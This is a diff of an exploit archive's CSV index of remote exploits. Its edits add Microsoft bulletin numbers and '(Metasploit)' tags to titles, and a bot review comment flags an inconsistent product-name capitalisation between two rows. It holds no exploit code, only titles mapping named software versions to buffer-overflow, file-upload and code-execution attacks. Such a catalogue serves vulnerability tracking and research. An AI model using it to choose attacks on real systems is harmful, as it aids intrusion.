 21088,platforms/unix/remote/21088.pl,"AOLServer 3 - Long Authentication String Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote,0
 21089,platforms/unix/remote/21089.c,"AOLServer 3 - Long Authentication String Buffer Overflow (2)",2001-09-05,qitest1,unix,remote,0
 21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0
@@ -11978,14 +11987,14 @@ id,file,description,date,author,platform,type,port
 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0
 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0
 21116,platforms/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0
-21118,platforms/windows/remote/21118.txt,"Microsoft Internet Explorer 5 - Zone Spoofing",2001-10-10,"kikkert security",windows,remote,0
+21118,platforms/windows/remote/21118.txt,"Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)",2001-10-10,"kikkert security",windows,remote,0
 21121,platforms/windows/remote/21121.pl,"Oracle9iAS Web Cache 2.0 - Buffer Overflow",2001-10-18,andreas,windows,remote,0
 21125,platforms/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 - Command Execution",2001-10-19,root@xpteam.f2s.com,cgi,remote,0
 21127,platforms/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 - JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",windows,remote,0
 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0
 21129,platforms/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0
 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass (Metasploit)",2012-08-30,Metasploit,linux,remote,0
-21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,Metasploit,multiple,remote,0
+21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (Metasploit) (1)",2012-09-08,Metasploit,multiple,remote,0
 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,php,remote,0
 21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0
 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0
@@ -12066,7 +12075,7 @@ id,file,description,date,author,platform,type,port
 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote,0
 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote,0
 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0
-21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0
+21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote,0
 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0
 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
 21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0
@@ -12125,7 +12134,7 @@ id,file,description,date,author,platform,type,port
 21541,platforms/windows/remote/21541.txt,"Microsoft SQL Server 2000 - SQLXML Script Injection",2002-06-12,"Matt Moore",windows,remote,0
 21542,platforms/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 - Web Server Buffer Overflow",2002-06-13,"Auriemma Luigi",windows,remote,0
 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0
-40415,platforms/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution",2016-09-22,Metasploit,multiple,remote,0
+40415,platforms/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,multiple,remote,0
 21554,platforms/windows/remote/21554.txt,"Imatix Xitami 2.5 - GSL Template Cross-Site Scripting",2002-06-14,"Matthew Murphy",windows,remote,0
 21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",windows,remote,0
 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",multiple,remote,0
@@ -12153,7 +12162,7 @@ id,file,description,date,author,platform,type,port
 21607,platforms/windows/remote/21607.txt,"GoAhead WebServer 2.1.x - URL Encoded Slash Directory Traversal",2002-07-10,"Matt Moore",windows,remote,0
 21608,platforms/windows/remote/21608.txt,"GoAhead WebServer 2.1.x - Error Page Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0
 21611,platforms/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - pbcgi.cgi Cross-Site Scripting",2002-07-11,"Matthew Murphy",windows,remote,0
-21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address",2002-07-12,JWC,windows,remote,0
+21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)",2002-07-12,JWC,windows,remote,0
 21614,platforms/freebsd/remote/21614.c,"ATPhttpd 0.4b - Buffer Overflow",2002-07-12,badc0ded,freebsd,remote,0
 21615,platforms/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote,0
 21616,platforms/windows/remote/21616.txt,"Working Resources 1.7.3 BadBlue - Null Byte File Disclosure",2002-06-13,"Matthew Murphy",windows,remote,0
@@ -12214,7 +12223,7 @@ id,file,description,date,author,platform,type,port
 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0
 21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0
 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 - XML Redirect File Disclosure",2002-08-23,"GreyMagic Software",windows,remote,0
-21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant",2002-04-16,"GreyMagic Software",windows,remote,0
+21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)",2002-04-16,"GreyMagic Software",windows,remote,0
 21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0
 21752,platforms/multiple/remote/21752.txt,"Blazix 1.2 - Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote,0
 21753,platforms/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.php Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote,0
@@ -12242,7 +12251,7 @@ id,file,description,date,author,platform,type,port
 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,4322
 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote,3217
 21839,platforms/windows/remote/21839.rb,"NTR - ActiveX Control StopModule() Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0
-21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0
+21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)",2012-10-10,Metasploit,windows,remote,0
 21841,platforms/windows/remote/21841.rb,"NTR - ActiveX Control Check() Method Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote,0
 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0
 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,java,remote,7001
@@ -12586,7 +12595,7 @@ id,file,description,date,author,platform,type,port
 23114,platforms/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation",2003-09-07,http-equiv,windows,remote,0
 23115,platforms/linux/remote/23115.c,"Mah-Jong 1.4 - Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,linux,remote,0
 23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote,0
-23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation",2003-09-08,http-equiv,windows,remote,0
+23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)",2003-09-08,http-equiv,windows,remote,0
 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0
 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0
 23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution (Metasploit)",2012-12-09,Metasploit,multiple,remote,0
@@ -12631,7 +12640,7 @@ id,file,description,date,author,platform,type,port
 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0
 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0
 23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
-23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun",2003-10-25,Adik,windows,remote,0
+23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0
 23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0
 23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
@@ -12705,7 +12714,7 @@ id,file,description,date,author,platform,type,port
 23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0
 23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0
 23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0
-23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass",2004-02-13,anonymous,windows,remote,0
+23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,windows,remote,0
 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow (Metasploit)",2012-12-20,Metasploit,windows,remote,0
 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0
 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0
@@ -12757,7 +12766,7 @@ id,file,description,date,author,platform,type,port
 23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
 23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0
-23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy",2004-02-03,"Andreas Sandblad",windows,remote,0
+23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0
 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution (Metasploit)",2012-12-25,Metasploit,windows,remote,0
 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection (Metasploit)",2012-12-25,Metasploit,windows,remote,0
 23651,platforms/php/remote/23651.rb,"WordPress Plugin WP-Property - Arbitrary .PHP File Upload (Metasploit)",2012-12-25,Metasploit,php,remote,0
@@ -12832,7 +12841,7 @@ id,file,description,date,author,platform,type,port
 24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,windows,remote,0
 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,php,remote,0
 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails - XML Processor YAML Deserialization Code Execution (Metasploit)",2013-01-10,Metasploit,multiple,remote,0
-24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free (Metasploit)",2013-01-10,Metasploit,windows,remote,0
+24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)",2013-01-10,Metasploit,windows,remote,0
 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution (Metasploit)",2013-01-10,Metasploit,windows,remote,0
 24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
@@ -12844,7 +12853,7 @@ id,file,description,date,author,platform,type,port
 24038,platforms/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0
 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0
 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0
-24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0
+24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (1)",2013-01-11,Metasploit,java,remote,0
 24065,platforms/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote,0
 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0
 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0
@@ -12924,7 +12933,7 @@ id,file,description,date,author,platform,type,port
 24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0
 24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0
 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0
-24336,platforms/cgi/remote/24336.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting",2004-07-30,dr_insane,cgi,remote,0
+24336,platforms/cgi/remote/24336.txt,"MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting",2004-07-30,dr_insane,cgi,remote,0
 24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0
 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0
 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0
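Review bot: The capitalisation fix on row 24336 (`MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting`) leaves the sibling row 24337 directly below it as `myServer 0.6.2 - ...`, so the two entries for the same product and version no longer match. Anyone checking this index for affected software with a case-sensitive product match will find only one of the two. Row 24337 should get the same change: `"MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Remote Overflow"`.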
@@ -12945,11 +12954,11 @@ id,file,description,date,author,platform,type,port
 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0
 24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0
 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0
-24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0
+24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,windows,remote,0
 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,multiple,remote,0
 24444,platforms/php/remote/24444.rb,"DataLife Engine - preview.php PHP Code Injection (Metasploit)",2013-02-01,Metasploit,php,remote,0
 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK - unique_service_name() Remote Code Execution (Metasploit)",2013-02-05,Metasploit,unix,remote,0
-24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0
+24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (Metasploit) (2)",2013-02-12,Metasploit,windows,remote,0
 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0
 24479,platforms/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
 24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote,0
@@ -12960,8 +12969,8 @@ id,file,description,date,author,platform,type,port
 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0
 24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary .PHP File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0
-24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0
-24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,Metasploit,multiple,remote,0
+24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-23,Metasploit,windows,remote,0
+24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (2)",2013-02-25,Metasploit,multiple,remote,0
 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
 24549,platforms/php/remote/24549.rb,"PolarPearCMS - Arbitrary .PHP File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
@@ -12987,7 +12996,7 @@ id,file,description,date,author,platform,type,port
 24686,platforms/windows/remote/24686.txt,"Microsoft Outlook 2003 - Security Policy Bypass",2004-10-18,http-equiv,windows,remote,0
 24687,platforms/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Plaintext Email Security Policy Bypass",2004-10-18,http-equiv,windows,remote,0
 24688,platforms/windows/remote/24688.pl,"best software SalesLogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0
-24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code",2004-10-20,http-equiv,windows,remote,0
+24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)",2004-10-20,http-equiv,windows,remote,0
 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0
 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",linux,remote,0
 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Cross-Site Scripting / Connection Proxy",2004-10-25,"Joxean Koret",multiple,remote,0
@@ -13042,7 +13051,7 @@ id,file,description,date,author,platform,type,port
 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0
 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
-24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)",2013-04-08,Metasploit,multiple,remote,0
+24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)",2013-04-08,Metasploit,multiple,remote,0
 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
 643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
 646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0
@@ -13116,7 +13125,7 @@ id,file,description,date,author,platform,type,port
 25129,platforms/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",windows,remote,0
 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0
 25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0
-25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0
+25136,platforms/php/remote/25136.rb,"phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0
 25137,platforms/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0
 25144,platforms/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal",2005-02-21,CorryL,windows,remote,0
 25146,platforms/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 - jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote,0
@@ -13149,7 +13158,7 @@ id,file,description,date,author,platform,type,port
 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0
 25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0
 25384,platforms/windows/remote/25384.c,"Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0
-25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow",2005-04-12,"Miguel Tarasc",windows,remote,0
+25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",windows,remote,0
 25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0
 25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0
 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0
@@ -13235,7 +13244,7 @@ id,file,description,date,author,platform,type,port
 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0
 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0
 25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
-25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0
+25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0
 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0
@@ -13259,7 +13268,7 @@ id,file,description,date,author,platform,type,port
 26152,platforms/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0
 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - 'msdds.dll' Remote Code Execution",2005-08-17,anonymous,windows,remote,0
 26168,platforms/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN 'Username' Enumeration",2005-08-18,"Roy Hills",hardware,remote,0
